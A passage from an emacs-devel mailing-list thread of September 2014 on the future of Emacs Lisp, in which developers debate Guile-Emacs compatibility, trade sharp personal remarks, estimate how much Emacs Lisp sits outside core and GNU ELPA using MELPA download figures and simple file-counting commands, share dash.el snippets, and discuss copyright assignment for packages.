not interpretation. :} Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 14:12 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-18 14:56 ` David Kastrup 2014-09-18 15:36 ` Taylan Ulrich Bayirli/Kammer 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-18 14:56 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: emacs-devel Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> writes: > David Kastrup <dak@gnu.org> writes: > >> At any rate, it has been mentioned previously in this discussion that >> the Emacs developer list is not always considered a happy-go-lucky >> environment. So if it is the habit of GUILE developers to take out >> revenge on a project and its users for enmity with single developers, >> that's also relevant for making crucial GNU software depend on GUILE. > > I don't see the Guile developers taking revenge on anyone --especially > not LilyPond as a whole-- but rather flaying off your efforts to take > revenge on them by passing on your anger. It was you who stated that you considered it likely that LilyPond was not given any support of GUILE developers because of me being a persona non grata. At some point of time you have to decide whether you mean what you say or not. > No need to be happy-go-lucky, just less insulting. > > You could probably continue taking part on guile-devel if you were more > cooperative. Since I am unconditionally not permitted to post there, that is hypothetical. >> I think this interpretation of events is not making for a much better >> outlook. Particularly because Emacs development is more often than >> other GNU projects governed by unpopular political decisions. A >> habit of retaliation and "see-where-this-will-get-you" in order to >> pressure for a change in project lead is not likely going to work out >> well. > > It's ironic that you would talk about retaliation and > "see-where-this-will-get-you" behavior, or am I misunderstanding? :-) > > It feels more like that's your attitude, despite there being no > pressure from the Guile side. As there will be "no pressure" from the GUILE side once they decide Emacs becomes too inconvient to support. >> I don't think that you are better off selling this situation as a >> personal vendetta, and it is not like the GUILE 2 problem was not >> already there when I started to get involved with LilyPond. > > Let's be honest here, it was obvious from your first mail on this > thread that there's something personal going on. I knew absolutely > nothing about your history on guile-devel (did not even recognize your > name), yet guessed immediately that there was something fishy. Not particularly hard to guess since I pointed _out_ that there was something fishy. >> "This is not possible" will be defined under the constraints of GUILE >> remaining Scheme according to GUILE's vision of interpretating the >> Scheme standard and its further evolution. > > Reminder that Guile-Emacs, in its current alpha state, already runs > ERC, Gnus, rcirc, Dired, term, comint, TRAMP, c-mode, etc. There will > definitely not be much that is impossible. Emacs is the platform for an ecosystem supporting thousands of packages. That requires a rather high level of compatibility. While you have ventured to say that you consider the move to Guile-Emacs as less disruptive as that to lexical binding, you have glossed over the fact that lexical binding has to be _explicitly_ enabled on a file-by-file basis, meaning that old code will run unchanged and with dynamic bindings. One cannot help the impression that there is a certain elasticity to the claims of what will be possible under which conditions that make them less than useful for long-range planning. Brad's status report in contrast was rather to the point, and the web page at <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> paints a more realistic picture of the current situation as well. At the current point of time, it definitely appears that the marketing department should not fear being overtaken by the engineering department, even though the latter is making solid progress. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 14:56 ` David Kastrup @ 2014-09-18 15:36 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 16:44 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-18 15:36 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > It was you who stated that you considered it likely that LilyPond was > not given any support of GUILE developers because of me being a persona > non grata. That's not "revenge." > As there will be "no pressure" from the GUILE side once they decide > Emacs becomes too inconvient to support. "Not gonna happen." :-) > Not particularly hard to guess since I pointed _out_ that there was > something fishy. Your attitude? I must have missed that. > Emacs is the platform for an ecosystem supporting thousands of packages. > That requires a rather high level of compatibility. Bug reports welcome. (With as little insults as possible.) > While you have ventured to say that you consider the move to Guile-Emacs > as less disruptive as that to lexical binding, you have glossed over the > fact that lexical binding has to be _explicitly_ enabled on a > file-by-file basis, meaning that old code will run unchanged and with > dynamic bindings. Lexical binding changes language semantics, Guile-Emacs doesn't. > One cannot help the impression that there is a certain elasticity to the > claims of what will be possible under which conditions that make them > less than useful for long-range planning. Consider the following: the name of this thread is "Emacs Lisp's future", and people talked about all sorts of changes to Elisp itself that they would like. And we two here are pondering whether Guile-Emacs *might* end up causing some *minor* changes to Elisp. (Backwards-incompatibilities rather; new features might be plenty.) > Brad's status report in contrast was rather to the point, and the web > page at <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> paints a > more realistic picture of the current situation as well. Do you see any points there that mention incompatibilities between Emacs Elisp and Guile Elisp semantics? > At the current point of time, it definitely appears that the marketing > department should not fear being overtaken by the engineering > department, even though the latter is making solid progress. I think the marketing department you have in mind consists of me, who is not exactly a Guile developer. *Hangs head in shame.* Sorry that my enthusiasm over Guile-Emacs and a more unified GNU system have annoyed you; no reason to accuse Guile of marketing. Give me all the blame. I might not reply to further mails though. Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 15:36 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-18 16:44 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-09-18 16:44 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: emacs-devel Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> writes: > David Kastrup <dak@gnu.org> writes: > >> Brad's status report in contrast was rather to the point, and the web >> page at <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> paints a >> more realistic picture of the current situation as well. > > Do you see any points there that mention incompatibilities between > Emacs Elisp and Guile Elisp semantics? My fault: that's actually the Todo list (which is also, uh, diverging just so slightly from your characterization of the current situation). The discussion of incompatible semantics and some of the consequences is at <URL:http://www.emacswiki.org/emacs/GuileEmacs>. >> At the current point of time, it definitely appears that the >> marketing department should not fear being overtaken by the >> engineering department, even though the latter is making solid >> progress. > > I think the marketing department you have in mind consists of me, who > is not exactly a Guile developer. *Hangs head in shame.* Sorry that > my enthusiasm over Guile-Emacs and a more unified GNU system have > annoyed you; no reason to accuse Guile of marketing. Give me all the > blame. The problem is not one of enthusiasm, it is one of extemporizing non-existent information and reinterpreting existing information based on one's preconceptions. While how people want things to be is not completely unrelated to how they will end up, that is much more the case when they can significantly contribute themselves to the things moving where they want them to be. But the main challenges here are of technical nature. I see a real problem regarding the #f '() nil situation. If you take a look, say, at <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=17474>, you'll find that thinking outside of the Scheme standard box even regarding useful choices for unspecified behavior is quite unpopular with GUILE. That's unfortunate for the chances of moving VM behavior and primitives in manners consciously more friendly towards Lisp semantics. The priority of GUILE very much lies with Scheme, with a narrow view towards filling functionality left open by the Scheme standard with anything more useful than throwing errors. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 15:07 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 15:33 ` David Kastrup @ 2014-09-17 17:13 ` Eli Zaretskii 2014-09-17 17:33 ` Stefan Monnier 2 siblings, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-09-17 17:13 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: phillip.lord, monnier, emacs-devel > From: Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> > Date: Wed, 17 Sep 2014 17:07:20 +0200 > Cc: Phillip Lord <phillip.lord@newcastle.ac.uk>, emacs-devel@gnu.org > > - Currently strings are an exception to the first point. I hope that > won't be too difficult to fix. Since Emacs is mainly about manipulating text, this is a very important point, and should IMO be addressed very soon, if Guile-Emacs is not going to be a pipe dream. Emacs has a unified infrastructure for dealing with text in buffers and strings, whereas Guile has only strings, and the implementation of i18n features for text is too dependent on the locales support in the underlying libc. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 15:07 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 15:33 ` David Kastrup 2014-09-17 17:13 ` Eli Zaretskii @ 2014-09-17 17:33 ` Stefan Monnier 2 siblings, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 17:33 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: Phillip Lord, emacs-devel > > Interoperability between languages is *hard*. Doing it so the result > > is lightweight and elegant (and moderately efficient) is rarely > > possible. > Well, the Elisp and Scheme integration is pretty great. These are arguably very closely related languages, so it's a kind of "best case" scenario. And even in that scenario, there are significant dark corners. Of course, you can learn to program in "Emacs Scheme" fairly quickly if you're familiar with Scheme, but it's not quite like programming in Scheme. And the docstrings can't be trusted because they point you to Elisp macros you can't use. And ... Now, think about what would happen when trying to interoperate with JS, Python, younameit, ... Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 11:17 ` Phillip Lord 2014-09-17 11:35 ` Nic Ferrier 2014-09-17 12:50 ` Stefan Monnier @ 2014-09-17 20:21 ` Richard Stallman 2014-09-18 12:48 ` Phillip Lord 2014-09-18 14:15 ` Rasmus 2014-09-17 22:49 ` Daniel Colascione 3 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-09-17 20:21 UTC (permalink / raw) To: Phillip Lord; +Cc: monnier, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Thinking of Emacs as an entire ecosystem, most of Emacs is already maintained independently from either Emacs core or GNU ELPA. That is a shocking statement -- is it really true? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 20:21 ` Richard Stallman @ 2014-09-18 12:48 ` Phillip Lord 2014-09-18 14:15 ` Rasmus 1 sibling, 0 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-18 12:48 UTC (permalink / raw) To: rms; +Cc: monnier, emacs-devel Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > Thinking of Emacs as an entire ecosystem, most of Emacs is already > maintained independently from either Emacs core or GNU ELPA. > > That is a shocking statement -- is it really true? Well, I thought to check, since I wasn't sure and the answer is actually no, it's about 50% in terms of file size. This is comparing *.el sizes. My actual figures are emacs (52M, 1411 lisp files), elpa (16M and 231) and MELPA (36M, 9530). I would guess that MELPA has most of the external packages; but I could be wrong. The low number of pacages in elpa compared to MELPA is probably a good thing, since there are a lot of very small ones in MELPA. Still, there is a lot of the emacs ecosystem outside of Emacs core or ELPA, even if it's not more. The methodology is below! Phil cd emacs-core (i.e. all the emacs lisp in /usr/share/emacs/24.3) find . -name "*elc" -exec rm {} \; find . -name "*gz" -exec gzip -d {} \; find . -name "*el" | wc 1411 1411 35522 du -shc * 52M lisp 52M total cd elpa find . -name "*el" | wc 231 231 8264 du -shc packages/ 16M packages/ 16M total cd melpa cd packages rm *tar rm *entry cd .. find . -name "*el" | wc 9530 9536 398787 du -shc packages 36M packages 36M total ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 20:21 ` Richard Stallman 2014-09-18 12:48 ` Phillip Lord @ 2014-09-18 14:15 ` Rasmus 2014-09-18 14:34 ` Phillip Lord 2014-09-18 23:17 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Rasmus @ 2014-09-18 14:15 UTC (permalink / raw) To: emacs-devel [-- Attachment #1: Type: text/plain, Size: 2632 bytes --] Hi, Richard Stallman <rms@gnu.org> writes: > Thinking of Emacs as an entire ecosystem, most of Emacs is already > maintained independently from either Emacs core or GNU ELPA. > > That is a shocking statement -- is it really true? I don't know. Probably not. The most important modes *I use* are part of GNU (core + GNU ELPA:. Org, prog-modes, Gnus, Company and AUCTeX. Surprisingly, EMMS is not in GNU ELPA. Using the download statistics from MELPA (attached) there's some packages with more than 20000 downloads. Now I'm not clear how this metrics come about, e.g. are upgrades counted as download and what it the time window etc.? Downloads: (apply '+ (mapcar 'cadr (remove-if (lambda (x) (member (car x) elpa)) melpa))) => 4060634 Popular packages not part of GNU ELPA (> 20000 downloads). I've added license when I know it. - magit (gpl3), vc on steroids for git only. - dash and s (both gpl3) are list and string functions. - autocomplete is like company in GNU ELPA. - flycheck is supposedly like flymode? - helm, pkg-info, popup (gpl3), epl. No idea. - cider, lisp environment, maybe the successor of slime? - smex (gpl3), ido-ubiquitous (gpl3): ido extensions - paredit (gpl3), smartparens: parentheses functions, useful for lisp. - Gh, github api functions, I guess. - expand-region, rainbow-delimiters, multiple-cursors, convenience Functions, I guess. - diminish, remove stuff from the modeline. magit | 83518 dash | 78019 auto-complete | 65754 popup | 59504 git-commit-mode | 59418 s | 58258 flycheck | 52859 helm | 50878 git-rebase-mode | 50865 epl | 48113 pkg-info | 46034 projectile | 39443 cider | 38332 smex | 36783 clojure-mode | 36467 f | 36240 zenburn-theme | 35887 markdown-mode | 35721 expand-region | 35027 haskell-mode | 34747 smartparens | 32636 ido-ubiquitous | 31920 rainbow-delimiters | 30480 ace-jump-mode | 29956 paredit | 28493 multiple-cursors | 27497 web-mode | 26960 solarized-theme | 26151 gitconfig-mode | 24642 elisp-slime-nav | 24482 diminish | 24190 inf-ruby | 23904 gitignore-mode | 23447 exec-path-from-shell | 21889 gh | 21598 php-mode | 21231 yaml-mode | 20169 Hope it helps, Rasmus -- I hear there's rumors on the, uh, Internets. . . [-- Attachment #2: melpa.el --] [-- Type: application/emacs-lisp, Size: 38836 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 14:15 ` Rasmus @ 2014-09-18 14:34 ` Phillip Lord 2014-09-18 15:01 ` Rasmus 2014-09-18 23:17 ` Richard Stallman 2014-09-18 23:17 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-18 14:34 UTC (permalink / raw) To: Rasmus; +Cc: emacs-devel Rasmus <rasmus@gmx.us> writes: > Hi, > > Richard Stallman <rms@gnu.org> writes: > >> Thinking of Emacs as an entire ecosystem, most of Emacs is already >> maintained independently from either Emacs core or GNU ELPA. >> >> That is a shocking statement -- is it really true? > > Using the download statistics from MELPA (attached) there's some > packages with more than 20000 downloads. Now I'm not clear how this > metrics come about, e.g. are upgrades counted as download and what it > the time window etc.? Yep, upgrades will be downloads. A number of packages on there are used for integration testing. So, I pull down dash on every checking for several of my projects. In time, I am sure dash will become the most downloaded package because of this. Once Emacs switches to git, I would guess the percentage of people on this list who do not install magit will shrink to a tiny number. My guesses are often wrong though! Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 14:34 ` Phillip Lord @ 2014-09-18 15:01 ` Rasmus 2014-09-18 16:08 ` Phillip Lord 2014-09-18 23:17 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Rasmus @ 2014-09-18 15:01 UTC (permalink / raw) To: phillip.lord; +Cc: emacs-devel Hi Phillip, phillip.lord@newcastle.ac.uk (Phillip Lord) writes: > Rasmus <rasmus@gmx.us> writes: > >> Hi, >> >> Richard Stallman <rms@gnu.org> writes: >> >>> Thinking of Emacs as an entire ecosystem, most of Emacs is already >>> maintained independently from either Emacs core or GNU ELPA. >>> >>> That is a shocking statement -- is it really true? >> >> Using the download statistics from MELPA (attached) there's some >> packages with more than 20000 downloads. Now I'm not clear how this >> metrics come about, e.g. are upgrades counted as download and what it >> the time window etc.? > > Yep, upgrades will be downloads. A number of packages on there are used > for integration testing. So, I pull down dash on every checking for > several of my projects. In time, I am sure dash will become the most > downloaded package because of this. I don't "get" dash and s, but lots of people developing more impressive things than I will ever be able to do seem happy with it so who am I to judge? When I write a patch, I intend it to become part of core, so dash/s are not options. > Once Emacs switches to git, I would guess the percentage of people on > this list who do not install magit will shrink to a tiny number. My > guesses are often wrong though! Magit is nice, and probably for a git gui *the best* you can get, but I'm still frustrated by it (how do I format-patch?!) and must often default to the terminal. The manual and things like staging are wonderful though. —Rasmus PS: I should have included this statistics before ;; Potential ELPA downloads (- (apply '+ (mapcar 'cadr melpa)) (apply '+ (mapcar 'cadr (remove-if (lambda (x) (member (car x) elpa)) melpa)))) => 196884 But this number makes little sense, as the most important components of Emacs are already part of the Emacs tarball (dired, gnus, org, prog-modes). Consider Python where Emacs has a *very* good mode build-in. Elpy "only" has 7790 downloads (but thanks for your work Jörgen, it's awesome!). —Rasmus -- Governments should be afraid of their people ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 15:01 ` Rasmus @ 2014-09-18 16:08 ` Phillip Lord 2014-09-18 16:18 ` Rasmus ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-18 16:08 UTC (permalink / raw) To: Rasmus; +Cc: emacs-devel Rasmus <rasmus@gmx.us> writes: >> Yep, upgrades will be downloads. A number of packages on there are used >> for integration testing. So, I pull down dash on every checking for >> several of my projects. In time, I am sure dash will become the most >> downloaded package because of this. > > I don't "get" dash and s, but lots of people developing more > impressive things than I will ever be able to do seem happy with it so > who am I to judge? When I write a patch, I intend it to become part > of core, so dash/s are not options. I think dash just makes list operations a lot easier. So, I use this, for instance, to nil a tree of markers. (defun m-buffer-nil-marker (markers) (-map (lambda (marker) (set-marker marker nil)) (-flatten markers))) I could also have done (--map (set-marker it nil) (-flatten markers)) or even (--tree-map (set-marker it nil) markers) I always found list operation in emacs a bit low-level. Dash also uses a lot names familar to people from other languages which help. I agree about getting into core, but with package.el coming on a-pace this might be less of a worry in future. > >> Once Emacs switches to git, I would guess the percentage of people on >> this list who do not install magit will shrink to a tiny number. My >> guesses are often wrong though! > > Magit is nice, and probably for a git gui *the best* you can get, but > I'm still frustrated by it (how do I format-patch?!) and must often > default to the terminal. The manual and things like staging are > wonderful though. I drop to the command line also. The manual is good though -- I think it says "with magit you'll probably only have to drop through to the command line once a day". True enough. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 16:08 ` Phillip Lord @ 2014-09-18 16:18 ` Rasmus 2014-09-18 19:23 ` Stefan Monnier 2014-09-18 23:18 ` Richard Stallman 2 siblings, 0 replies; 404+ messages in thread From: Rasmus @ 2014-09-18 16:18 UTC (permalink / raw) To: emacs-devel phillip.lord@newcastle.ac.uk (Phillip Lord) writes: > Rasmus <rasmus@gmx.us> writes: > >>> Yep, upgrades will be downloads. A number of packages on there are used >>> for integration testing. So, I pull down dash on every checking for >>> several of my projects. In time, I am sure dash will become the most >>> downloaded package because of this. >> >> I don't "get" dash and s, but lots of people developing more >> impressive things than I will ever be able to do seem happy with it so >> who am I to judge? When I write a patch, I intend it to become part >> of core, so dash/s are not options. > > I think dash just makes list operations a lot easier. So, I use this, > for instance, to nil a tree of markers. > > (defun m-buffer-nil-marker (markers) > (-map > (lambda (marker) > (set-marker marker nil)) > (-flatten markers))) Flatten in nontrivial, but assuming you got something similar there's no difference from mapcar or mapc, no? > I could also have done > > (--map (set-marker it nil) > (-flatten markers)) > > or even > > (--tree-map > (set-marker it nil) > markers) That is cool, yes, but not really (much) easier, and perhaps a bit less readable. Anyway, we're getting off topic here. > I always found list operation in emacs a bit low-level. Dash also uses a > lot names familar to people from other languages which help. I agree > about getting into core, but with package.el coming on a-pace this might > be less of a worry in future. But this drives good stuff into external packages. When search-costs are non-nil this could be bad. . . It's bad enough that, say, AUCTeX is not part of the Emacs tarball. Cheers, Rasmus -- ⠠⠵ ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 16:08 ` Phillip Lord 2014-09-18 16:18 ` Rasmus @ 2014-09-18 19:23 ` Stefan Monnier 2014-09-18 23:18 ` Richard Stallman 2 siblings, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-18 19:23 UTC (permalink / raw) To: Phillip Lord; +Cc: Rasmus, emacs-devel > (defun m-buffer-nil-marker (markers) > (-map > (lambda (marker) > (set-marker marker nil)) > (-flatten markers))) I must say I dislike flatten. Here for example, it just creates a list to iterate over some elements. > (--tree-map > (set-marker it nil) > markers) That's much better, for instance. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 16:08 ` Phillip Lord 2014-09-18 16:18 ` Rasmus 2014-09-18 19:23 ` Stefan Monnier @ 2014-09-18 23:18 ` Richard Stallman 2014-09-19 0:00 ` Rasmus 2 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-09-18 23:18 UTC (permalink / raw) To: Phillip Lord; +Cc: rasmus, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] If dash is a useful tool, we should incorporate it into Emacs. Who is the author of dash? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 23:18 ` Richard Stallman @ 2014-09-19 0:00 ` Rasmus 2014-09-19 8:00 ` Nic Ferrier 0 siblings, 1 reply; 404+ messages in thread From: Rasmus @ 2014-09-19 0:00 UTC (permalink / raw) To: rms; +Cc: magnars, emacs-devel Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > If dash is a useful tool, we should incorporate it into Emacs. > Who is the author of dash? Magnar Sveen (Cc) is the author of dash.el and s.el together with contributors. —Rasmus -- The Kids call him Billy the Saint ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 0:00 ` Rasmus @ 2014-09-19 8:00 ` Nic Ferrier 2014-09-19 10:46 ` Stephen J. Turnbull ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: Nic Ferrier @ 2014-09-19 8:00 UTC (permalink / raw) To: Rasmus; +Cc: magnars, rms, emacs-devel Rasmus <rasmus@gmx.us> writes: > Richard Stallman <rms@gnu.org> writes: > >> [[[ To any NSA and FBI agents reading my email: please consider ]]] >> [[[ whether defending the US Constitution against all enemies, ]]] >> [[[ foreign or domestic, requires you to follow Snowden's example. ]]] >> >> If dash is a useful tool, we should incorporate it into Emacs. >> Who is the author of dash? > > Magnar Sveen (Cc) is the author of dash.el and s.el together with > contributors. This is a very big problem. A lot of non-GNU-Emacs emacs packages (stuff on Melpa, stuff on Marmalade) have depends to s and dash. So they can't be integrated into Emacs until s and dash are. My understanding is that Magnars lost control of contributors to s and dash some time ago. Getting people to sign papers will be hard. It's very sad. I am torn between a much more open and distributed Emacs (which I suspect rms won't like) and having Emacs stay guaranteed free and pretty much consistent. But that's what we did when we introduced packages. How else did people think it would end? Nic ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 8:00 ` Nic Ferrier @ 2014-09-19 10:46 ` Stephen J. Turnbull 2014-09-19 11:12 ` David Kastrup ` (2 more replies) 2014-09-19 18:01 ` Richard Stallman [not found] ` <<E1XV2UO-0005CA-Vk@fencepost.gnu.org> 2 siblings, 3 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-09-19 10:46 UTC (permalink / raw) To: Nic Ferrier; +Cc: magnars, rms, Rasmus, emacs-devel Nic Ferrier writes: > I am torn between a much more open and distributed Emacs (which I > suspect rms won't like) What's not open or distributed about Emacs? Maintaining legal paperwork is a cost and an inconvenience, but the GPL itself legally guarantees openness and in practice Emacs development is highly distributed. ELPA is only going to provide more cases where people want to "sign papers", or to gather "papers" from their coauthors. I can't see this as a problem -- Emacs will acquire more copyrights than it would have otherwise. I suppose it's theoretically possible that the body of unassigned and perhaps unassignable Emacs Lisp will grow faster than the body of assigned Emacs Lisp, but I doubt it. Even if it does, most people do obey the rules, and the body of free software will increase. > and having Emacs stay guaranteed free There are no guarantees. It is certainly possible that an SCO-like attack could be made on Emacs, especially via submarine patent. The FSF legal policy merely makes it less likely to succeed, and provides the FSF the option of shifting costs onto contributors if it fails to defend the copyrights they claimed to assign. > But that's what we did when we introduced packages. How else did > people think it would end? Huh? Packages simply are a way of making long-standing practices (development and distribution by satellite projects) more convenient for end users, permitting multiple development cycles for "core" modules if desired by the core developers, and to some extent blurring the line between core-developer and end-user convenience. As long as GNU ELPA exists, there is no reason to believe that Emacs is at any more legal risk than ever. The only legal "danger" to Emacs created by third-party packages is that, because of the greater convenience, people who otherwise would not have used them at all may be exposed to "buccaneer" packages from folks who play fast and loose with the GPL. As long as everybody is aware that GNU ELPA protects them from that, it's their choice. You may not like knowing some will make the "wrong" choice, and I know RMS doesn't like it, but what do you propose as the alternative that is safer? The package system itself doesn't favor or enable GPL violations and other unfree practices, except possibly as a side effect of more free software being available to violate (unlike "permissive" licensing, which does enable unfree distribution and intentionally does so). The practical problem created by packages is (to some eyes) a blessing in disguise. By enabling convenient separate development and distribution of many more Lisp packages than would otherwise exist, separate from Emacs core, it "exports" many APIs that would otherwise be considered internal. Developers wishing to change these "exported" APIs will encounter a lot more resistance, especially from package maintainers whose development cycles differ from the core's. But many projects have found such discipline to be useful in encouraging development of a community of library modules and applications. Consider-the-source-ly y'rs, Steve ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 10:46 ` Stephen J. Turnbull @ 2014-09-19 11:12 ` David Kastrup 2014-09-19 16:16 ` Stephen J. Turnbull 2014-09-19 11:38 ` Nic Ferrier 2014-09-19 11:53 ` Rasmus 2 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-19 11:12 UTC (permalink / raw) To: emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Nic Ferrier writes: > > > I am torn between a much more open and distributed Emacs (which I > > suspect rms won't like) > > What's not open or distributed about Emacs? Maintaining legal > paperwork is a cost and an inconvenience, but the GPL itself legally > guarantees openness and in practice Emacs development is highly > distributed. ELPA is only going to provide more cases where people > want to "sign papers", or to gather "papers" from their coauthors. I > can't see this as a problem -- Emacs will acquire more copyrights than > it would have otherwise. > > I suppose it's theoretically possible that the body of unassigned and > perhaps unassignable Emacs Lisp will grow faster than the body of > assigned Emacs Lisp, but I doubt it. Even if it does, most people do > obey the rules, and the body of free software will increase. > > > and having Emacs stay guaranteed free > > There are no guarantees. It is certainly possible that an SCO-like > attack could be made on Emacs, especially via submarine patent. The > FSF legal policy merely makes it less likely to succeed, and provides > the FSF the option of shifting costs onto contributors if it fails to > defend the copyrights they claimed to assign. The cost-shifting is not likely to ever trigger since it is rather explicitly only applicable for deliberate or at least conscious inclusion of material from uncleared origin. I think it's more a protection against blatant submarines. What the assignments do does not significantly protect against "an attack on Emacs". Rather they make sure that the FSF can aggressively pursue violations of the GPL on Emacs without having to fear muddy waters resulting in large legal costs and settlements. Now that's my personal take of the situation. I cannot vouch for Richard's though: after all, the main trigger for creating the GPL _was_ a cease-and-desist call concerning the redistribution of derivatives of Gosling's Emacs variant, causing a bunch of lost work. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 11:12 ` David Kastrup @ 2014-09-19 16:16 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-09-19 16:16 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup writes: > The cost-shifting is not likely to ever trigger since it is rather > explicitly only applicable for deliberate or at least conscious > inclusion of material from uncleared origin. Not the one I signed. The one I signed for XEmacs in 1998 makes me unconditionally responsible for any costs incurred by the FSF in an unsuccessful defense of my contribution from a copyright challenge. I have no legal protection in that event. Just the good sense of the FSF legal staff. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 10:46 ` Stephen J. Turnbull 2014-09-19 11:12 ` David Kastrup @ 2014-09-19 11:38 ` Nic Ferrier 2014-09-19 18:02 ` Richard Stallman 2014-09-19 11:53 ` Rasmus 2 siblings, 1 reply; 404+ messages in thread From: Nic Ferrier @ 2014-09-19 11:38 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: magnars, rms, Rasmus, emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Nic Ferrier writes: > > > I am torn between a much more open and distributed Emacs (which I > > suspect rms won't like) > > What's not open or distributed about Emacs? Maintaining legal > paperwork is a cost and an inconvenience, but the GPL itself legally > guarantees openness and in practice Emacs development is highly > distributed. ELPA is only going to provide more cases where people > want to "sign papers", or to gather "papers" from their coauthors. I > can't see this as a problem -- Emacs will acquire more copyrights than > it would have otherwise. I think Emacs is free, not "open". Slightly different goals, I applaud both. To me, freedom is, on the whole, more important. Other people disagree though. > I suppose it's theoretically possible that the body of unassigned and > perhaps unassignable Emacs Lisp will grow faster than the body of > assigned Emacs Lisp, but I doubt it. Even if it does, most people do > obey the rules, and the body of free software will increase. I don't think anything in MELPA is not free. It's certainly not all GPLed though. And I think we already have the situation of anti-GPL people contributing to MELPA. I've agreed with RMS to require the GPL or compatible for Marmalade. > The practical problem created by packages is (to some eyes) a blessing > in disguise. By enabling convenient separate development and > distribution of many more Lisp packages than would otherwise exist, > separate from Emacs core, it "exports" many APIs that would otherwise > be considered internal. And those APIs that most Emacs users may come to rely on (I use the term "Emacs" when really I mean "most Emacs users") may not be free. Hence freedom is potentially threatened. The FSF has the rules it has for a reason. The openness people don't 